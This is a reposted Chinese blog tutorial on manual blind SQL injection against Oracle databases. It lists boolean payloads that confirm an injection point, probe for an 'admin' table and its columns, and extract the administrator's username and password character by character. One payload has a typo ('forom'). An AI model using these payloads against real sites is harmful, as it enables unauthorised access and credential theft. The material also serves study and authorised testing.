Oracle 数据库的简单手动注入

其他 2018-10-09 18:09:52 阅读次数: 0

日常判断注入点 and 1=1
and 1=2
爆破手段:
判断表
and (select count(*) from admin)<>0 返回正常,则有admin表,否则,无

判断列名
and (select count(列名) forom admin) <> 0 返回正常,则有该列名,否则,无

爆管理员账号密码:
先判断管理员账户字符长度
and (select count(*) from admin where length(name(此处是表中管理员账户的列名)) >= num) =1 这里的num是猜测的数字(但是如果开发者在建表时针对用户名的数据类型使用的是char而不是varchar呢)

		爆用户名的第一个,第二个,第三个。。。。字符
		and (select count(*) from admin where ascii(substr(name,1,1)) >=num) =1这里的num是猜测的数字,再对照ascii表去找出对应的字符
		and (select count(*) from admin where ascii(substr(name,2,1)) >=num) =1
		and (select count(*) from admin where ascii(substr(name,3,1)) >=num) =1
		......
		依次爆出账户名的全部字符
		
		判断密码的字符长度
		and (select count(*) from admin where length(pwd(此处是表中管理员密码的列名)) >= num) =1
		爆密码的第一个,第二个,第三个。。。。字符
		and (select count(*) from admin where ascii(substr(pwd,1,1)) >=num) =1
		and (select count(*) from admin where ascii(substr(pwd,2,1)) >=num) =1
		and (select count(*) from admin where ascii(substr(pwd,3,1)) >=num) =1
		......
		依次爆出密码的全部字符

猜你喜欢

转载自blog.csdn.net/qq_42042353/article/details/82984837
今日推荐
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
周排行
浏览器对同一域名进行请求的最大并发连接数
React Hook之自定义Hook
【转】MyBatis缓存机制
-Java-泛型
自动化测试常用脚本-发送邮件
LeetCode#859: Buddy Strings
java、Python处理字符串
第二篇の博客
Hadoop伪分布式环境安装
SQL Server进阶(十一)临时表、表变量
每日归档
更多
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022